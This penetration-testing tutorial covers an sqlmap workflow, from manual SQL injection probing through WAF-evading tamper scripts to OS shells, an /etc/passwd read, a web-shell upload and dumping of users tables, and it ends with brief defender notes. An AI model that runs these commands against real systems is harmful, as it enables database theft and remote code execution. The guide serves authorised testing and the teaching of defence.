sqlmap Advanced Workflow: From Identification to System Access

Last updated: April 26, 2026

sqlmap is the canonical SQL injection automation tool. Most pentesters run it with default flags and accept whatever it produces. Senior practitioners use sqlmap as one stage in a workflow — manual identification of injectable parameters first, sqlmap for exploitation, custom tampering for WAF bypass, OS-level pivoting for command execution. This article covers the sqlmap workflow that produces actual findings, not just scan output.

The default trap

sqlmap -u 'target/page?id=1' --batch tries every default technique against the URL. It often misses parameters in headers, body, JSON, or that require authentication. The senior workflow:

Stage 1: Manual identification

Before sqlmap, manually test for SQLi. Burp’s Active Scanner finds many; for the rest:

• Append ' or " to parameters; observe error responses
• Test boolean conditions — 1 AND 1=1 vs 1 AND 1=2
• Test time-based — 1; WAITFOR DELAY '0:0:5'
• Test in headers (User-Agent, Referer, X-Forwarded-For), cookies, JSON body fields

Identify the parameter and dialect first. Then sqlmap exploits.

Stage 2: sqlmap targeted exploitation

# Target a known-vulnerable parameter
sqlmap -u 'target/page?id=1' -p id --dbms=mysql --batch

# With authentication cookie
sqlmap -u 'target/page?id=1' --cookie='PHPSESSID=abc' --level=3 --risk=2

# POST body
sqlmap -u 'target/login' --data='user=admin&pass=test' -p user

# JSON body
sqlmap -u 'target/api' --data='{"id":1}' -p id

# Header injection
sqlmap -u 'target/page' -H 'X-Forwarded-For: 1' -p X-Forwarded-For

# Full request from file (Burp save)
sqlmap -r request.txt -p id --batch

# Increase coverage
sqlmap -u 'target/page?id=1' --level=5 --risk=3 --batch

Stage 3: Tamper for WAF bypass

WAFs detect canonical sqlmap payloads. sqlmap ships with tamper scripts that mutate them:

# List available tampers
sqlmap --list-tampers

# Common bypasses
sqlmap -u 'target/page?id=1' --tamper=between,randomcase,space2comment

# Aggressive WAF evasion (multiple tampers)
sqlmap -u 'target/page?id=1' \
  --tamper=apostrophemask,base64encode,charencode,equaltolike,space2comment

Stage 4: Beyond data dumping — system access

Once sqlmap confirms SQL injection, several modes go further:

# Enumerate databases / tables / data
sqlmap -u 'target' --dbs
sqlmap -u 'target' -D <db> --tables
sqlmap -u 'target' -D <db> -T users --dump

# Get a SQL shell
sqlmap -u 'target' --sql-shell

# Get an OS shell (where DB user has FILE privilege or xp_cmdshell)
sqlmap -u 'target' --os-shell

# File read / write
sqlmap -u 'target' --file-read='/etc/passwd'
sqlmap -u 'target' --file-write=local.php --file-dest=/var/www/html/shell.php

For MSSQL with sysadmin privilege:

sqlmap -u 'target' --os-cmd='whoami' --os-shell

This enables xp_cmdshell and runs commands as the SQL Server service account.

Output processing

sqlmap saves session in ~/.local/share/sqlmap/output/<target>/. Database dumps end up here in CSV format. For large dumps, use --batch --threads=8 for parallelism.

Defender perspective

• WAF rules with sqlmap-specific signatures (User-Agent often gives it away).
• Database-side: query patterns with characteristic UNION counts, suspicious WHERE clauses, frequent errors.
• Web app logs: request patterns matching sqlmap’s payload templates.
• Egress filtering: sqlmap with --os-shell wants to connect outbound; block at firewall.

The takeaway

sqlmap is a power tool, not a magic wand. Identify the injection manually first; use sqlmap for systematic exploitation; layer tamper scripts for WAF bypass; pivot to system access where DB privileges allow. The workflow turns a SQL injection finding from “we have it” into a full database extraction or RCE.